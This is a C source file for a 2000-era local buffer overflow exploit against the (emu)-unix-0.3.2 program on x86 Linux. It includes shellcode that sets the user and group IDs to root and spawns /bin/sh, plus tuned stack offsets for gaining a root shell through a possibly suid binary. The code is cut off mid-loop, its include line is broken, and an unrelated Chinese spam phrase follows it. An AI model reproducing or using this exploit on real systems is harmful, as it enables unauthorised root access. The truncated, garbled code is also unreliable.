/* (emu)-unix-0.3.2 local buffer overflow - x86. * Author: Cody Tubbs (loophole of hhp). * Site: www.hhp-programming.net * Email: pigspigs@yahoo.com * Date: 2.2.2000 * * Note: No 'make install' within the Makefile, possible suid. * (This exploit probably wont be on our site long). */ #include #define OFFSET -9676 // Worked for me on Slack 7.0, also -[9668/9640/9636/etc]. #define ALLIGN 0 // Doesn't need to be changed. #define NOP 0x90 #define DBUF 400 static char shellcode[]= "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\x66\x31\xc0\x66\x31\xdb\xb0\x2e" "\xcd\x80\xeb\x1f\x5e\x89\x76\x08" "\x31\xc0\x88\x46\x07\x89\x46\x0c" "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d" "\x56\x0c\xcd\x80\x31\xdb\x89\xd8" "\x40\xcd\x80\xe8\xdc\xff\xff\xff" "/bin/sh\x69"; long get_sp(void){__asm__("movl %esp,%eax");} void workit(char *heh){ fprintf(stderr, "(emu)-unix-0.3.2 local buffer overflow - x86.\n"); fprintf(stderr, "Author: Cody Tubbs (loophole of hhp).\n"); fprintf(stderr, "Usage: %s [offset] [allign(0..3)]\n", heh); } main(int argc, char **argv){ char eipeip[DBUF], buffer[7192], heh[DBUF+1]; int i, offset, gid, allign; long address; workit(argv[0]); if(argc>1){offset=atoi(argv[1]);}else{offset=OFFSET;} if(argc>2){allign=atoi(argv[2]);}else{allign=ALLIGN;} address=get_sp()-offset; if(allign>0){for(i=0;i

亚洲欧美在线